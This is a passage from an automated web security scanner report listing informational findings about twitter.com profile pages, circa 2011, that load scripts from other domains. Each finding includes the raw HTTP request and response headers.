<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296173346/javascripts/twitter.js?1296177106" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/lib/jquery.tipsy.min.js?1296177106" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/gears_init.js?1296177106" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296177106" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296173346/javascripts/geov1.js?1296177106" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/api.js?1296177106" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296177106" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296173346/javascripts/dismissable.js?1296177106" type="text/javascript"></script>
...[SNIP]...

18.408. http://twitter.com/creationix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /creationix

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /creationix HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-68082-17773
ETag: "b84f4f9cc8d7f0be4a449ccb6ba5ef8c"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 52514
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.409. http://twitter.com/dandenney

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /dandenney

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234711-35198-40102
ETag: "8b2e26d3b0f6c8a5ad227c0c35512ccd"
Last-Modified: Fri, 28 Jan 2011 17:11:51 GMT
X-Runtime: 0.00812
Content-Type: text/html; charset=utf-8
Content-Length: 54302
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.410. http://twitter.com/dandenney

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /dandenney

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225059-14036-20243
ETag: "b216b5fbcf2d794e1118d2a88b30a946"
Last-Modified: Fri, 28 Jan 2011 14:30:59 GMT
X-Runtime: 0.01217
Content-Type: text/html; charset=utf-8
Content-Length: 54426
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.411. http://twitter.com/danwrong

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /danwrong

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234700-81716-17669
ETag: "ed854b28d046d2d11bf9552c270f6d24"
Last-Modified: Fri, 28 Jan 2011 17:11:40 GMT
X-Runtime: 0.00756
Content-Type: text/html; charset=utf-8
Content-Length: 50053
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.412. http://twitter.com/danwrong

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /danwrong

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-52425-1613
ETag: "e308391ad5a4a27e5094e4fd0c33693a"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01151
Content-Type: text/html; charset=utf-8
Content-Length: 50051
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.413. http://twitter.com/davevogler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /davevogler

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /davevogler HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225046-53952-21746
ETag: "2ad3827a054ebfaafa3ae7d33a059d42"
Last-Modified: Fri, 28 Jan 2011 14:30:46 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 53247
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.414. http://twitter.com/deionbranch84

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /deionbranch84

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /deionbranch84 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265287-45791-20728
ETag: "cf921750730cd97318f25ed57b09cad3"
Last-Modified: Sat, 29 Jan 2011 01:41:27 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 50211
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/twitter.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296246715" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/geov1.js?1296246715" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/api.js?1296246715" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/dismissable.js?1296246715" type="text/javascript"></script>
...[SNIP]...

18.415. http://twitter.com/dougneiner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /dougneiner

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dougneiner HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225073-41249-57241
ETag: "a0613392b43e537b2e040e0724b95bf7"
Last-Modified: Fri, 28 Jan 2011 14:31:13 GMT
X-Runtime: 0.01266
Content-Type: text/html; charset=utf-8
Content-Length: 53641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
